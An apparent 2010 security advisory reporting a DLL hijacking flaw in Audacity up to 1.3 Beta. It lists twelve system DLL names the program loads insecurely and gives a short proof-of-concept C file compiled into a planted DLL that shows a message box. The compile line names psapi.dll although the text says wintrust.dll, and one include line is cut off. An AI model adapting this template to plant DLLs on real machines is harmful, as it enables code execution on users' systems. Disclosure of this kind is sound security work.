Audacity <= 1.3 DLL Hijacking Vulnerability Name Audacity Vendor http://audacity.sourceforge.net Versions Affected <= 1.3 Beta Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date 2010-10-29 X. INDEX I. ABOUT THE APPLICATION II. DESCRIPTION III. ANALYSIS IV. SAMPLE CODE V. FIX I. ABOUT THE APPLICATION ________________________ Audacity is free, open source software for recording and editing sounds. II. DESCRIPTION _______________ The vulnerability is caused due to the application loading libraries in an insecure manner. I tested the versions 1.2.6 (stable) and the 1.3 Beta. Other versions could be vulnerable. III. ANALYSIS _____________ Summary: A) DLL Hijacking A) DLL Hijacking ________________ The Audacity's installation folder by defaul t doesn't contains DLLs files. When it tries to load some DLLs, first of all, looks at the installation directory and after in system32 directory. Due of this is possible to hijack the load operation in order to load a malicious DLL file with the same name. The following is the list of affected DLLs: wintrust.dll msasn1.dll msacm32.dll midimap.dll wsock32.dll ws2_32.dll ws2help.dll winmm.dll lpk.dll usp10.dll setupapi.dll crypt32.dll IV. SAMPLE CODE _______________ A) DLL Hijacking The following is the sample code (evil.c) for wintrust.dll: // compile: gcc -shared -o psapi.dll evil.c #include BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { MessageBox(0, "DLL Hijacking!", "Salvatore Fresta", MB_OK); return TRUE; } V. FIX ______ No fix.